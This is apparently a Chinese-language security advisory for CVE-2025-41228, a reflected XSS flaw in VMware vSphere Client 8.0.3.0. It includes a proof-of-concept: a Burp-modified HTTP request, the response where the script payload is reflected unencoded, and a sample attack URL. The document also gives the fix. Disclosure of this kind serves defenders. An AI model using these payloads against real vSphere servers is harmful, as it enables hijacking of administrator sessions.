VMware vSphere Client 8.0.3.0 - 反射型跨站脚本(XSS)漏洞

• 漏洞标题: VMware vSphere Client 8.0.3.0 - 反射型跨站脚本(XSS)
• 披露日期: 2025-08-08
• 漏洞作者: Imraan Khan (Lich-Sec)
• 厂商主页: https://www.vmware.com
• 影响版本: vSphere Client 8.0.3.0
• 测试环境: Chrome 138浏览器
• CVE编号: CVE-2025-41228
• 漏洞分类: Web应用漏洞

漏洞描述

VMware vSphere Client 8.0.3.0版本存在反射型跨站脚本(XSS)漏洞。该漏洞源于应用程序未能对通过查询字符串传递到/folder端点的输入进行有效过滤，当反射值被渲染到HTML表单的action属性时，可导致任意JavaScript代码执行。

该漏洞通过Burp Suite拦截请求并注入恶意载荷的方式确认。此XSS仅在浏览器处于已认证会话中渲染响应时才能成功触发。

复现步骤

1. 向漏洞端点发起请求

在浏览器中访问：

1

https://host/folder?ht7j4

这将发送一个待拦截的普通请求。

2. 使用Burp Suite拦截并修改请求

启用Burp Suite代理后，捕获请求并修改查询字符串注入XSS载荷：

1
2
3
4
5

GET /folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1 HTTP/2
Host: 192.168.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Referer: https://192.168.x.x/
Accept: text/html,application/xhtml+xml

然后将修改后的请求转发至服务器。

3. 观察HTTP响应中的反射载荷

在Burp的HTTP响应中，载荷未经编码直接出现在HTML中：

1
2

<form action="/folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1" method="POST">
  <input name="VMware-CSRF-Token" type="hidden" value="..." />

这确认了载荷被危险地反射到HTML表单的action属性中，允许脚本执行。

4. 触发脚本执行

由于该XSS仅在完整浏览器上下文中渲染，需通过以下方式观察弹窗：

• 使用Burp携带已认证会话的cookie重放恶意请求
• 或使用Burp的**“Open in Browser”**功能（含会话cookie）请求完整响应

页面渲染时，浏览器将执行注入的<script>。

示例攻击URL：

1

https://192.168.x.x/folder?ht7j4"><script>alert(1)</script>tnkav=1

影响范围

成功利用可导致在vSphere Client网页界面中执行任意JavaScript代码，可能被用于钓鱼攻击、会话劫持或进一步危害管理员浏览器会话。

修复建议

升级至VMware vCenter Server 8.0 U3e或更高版本，该版本已修复CVE-2025-41228漏洞。

参考链接

• https://nvd.nist.gov/vuln/detail/CVE-2025-41228
• https://www.vmware.com/security/advisories